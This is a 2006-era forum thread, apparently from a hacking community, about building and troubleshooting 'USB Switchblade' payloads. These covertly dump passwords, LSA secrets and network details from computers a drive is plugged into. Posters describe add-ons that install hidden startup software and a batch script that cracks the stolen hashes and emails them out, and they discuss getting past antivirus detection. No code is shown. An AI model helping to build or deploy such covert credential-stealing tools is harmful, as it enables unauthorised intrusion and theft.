USB Switchblade Development


Darren Kitchen

I'm still trying to run this on my win 2000 box at work with no luck. I just noticed it detects a virus. How are you supposed to get around that...

Is the u3 version better than this? I have a u3 version, but if I replace the partition with the new payload can I get my original setup back?


I have created a quick add-on for the USB switchblade that installs fold@home on the target computer, then installs it like the hacksaw, which has it run at startup and hides in a folder depending on the privileges. The download link is http://d.turboupload.com/d/1069130/USB-fh.zip.html . I'm sure there are problems somewhere in there, or better ways to do it. Just let me know and I'll fix it.

b0xybr0wn


I have been playing with these various versions of the payloads and have a question. I was running Cain and Abel and was trying to retrieve the LSA secrets, and now I get the LSASS.exe error where it automatically reboots my PC in 60 seconds. Did I somehow infect my PC with something in testing these payloads?

Any info will be greatly appreciated.


Sorry for the double post, but this is the last time for a while that I'll be able to work on it (1-2 days). I've made it so that it dumps the network info as previously described, and the batch to start auto-cracking and emailing is almost ready. It just bugs out at the last second. If anyone can tell me where to upload it tomorrow that would be great. I based it off of the dssl payload.


/me worries that this thread will suffer the same fate as Pandora......

<flame>

To all of you fsckers who are complaining about your shit not working:

RTFM. If that does not work, stop, think about it, then try again. Use your brain!

</flame>

Thank you.


/me worries that this thread will suffer the same fate as Pandora......

And that's why USB hacks has its own board now. It's too big for just a thread. I foresee eventually a how-to thread for noobs being stickied. Not that noobs need this kind of tool in their arsenal, but hey.


The reason people ask for help is because people will usually help them.

Can't complain that people want help with this. Everyone is a noob at one point, and this is fairly new, so you can expect people unable to figure it out, and other miscellaneous problems.

Yes, many of the questions are stupid, and the people should be able to figure it out themselves, but sometimes that's not the case.

If you have a problem with people asking questions, why don't you just ignore the questions? It's not that hard.


Ras, the problem is that in order to update the U3 partition, you need a program to do so. Currently, I only know of one for Sandisk drives (hence why everyone is recommending buying the Cruzers). If you would have carefully read the main post (or even skimmed over it), you would have seen that. That is why a5an0 is getting upset. He assumed that people would buy supported hardware for this. Until someone can find a way to reverse engineer the Kingston drives (which is possibly illegal) or Kingston releases a tool to update the U3 partition, Kingston users are kinda screwed.

The only other option is hope that someone will write a U3 Launcher compatible loader (I'm trying to, but my coding skills suck, and I'm having a few problems with VBStudio) and install it onto your U3 loader, but then, that removes the possibility of discreetness.

P.S. If people were to search Google for every question, there would be no use for message boards. These exist for communicating (that includes asking questions).


@Ouroboros

DeviceLock does most of this. It does not whitelist apps, but drive serials.

Sygate was working on a program that you could "map" applications to whitelist. However, Symantec acquired them and I'm not sure what became of it.

May want to check out DeviceWall (http://www.devicewall.com). It has whitelisting, and it also has connection and file audits and built-in USB encryption, as well as measures to prevent tampering. You can block all U3 drives, for example, only allow a certain group read access to iPods, etc.


I have been playing with these different payloads and also with rainbow crack. This morning I had a message from Norton that it found a virus. Is this from one of the payloads?

Scan type: Realtime Protection Scan

Event: Virus Found!

Virus name: Hacktool

File: C:\System Volume Information\_restore{D1C2C251-F788-4617-A3F2-1132F2ED59F6}\RP264\A0026729.exe

Location: Quarantine

Computer: BILL

User: SYSTEM

Action taken: Clean failed : Quarantine succeeded : Access denied

Date found: Thu Oct 12 07:08:49 2006
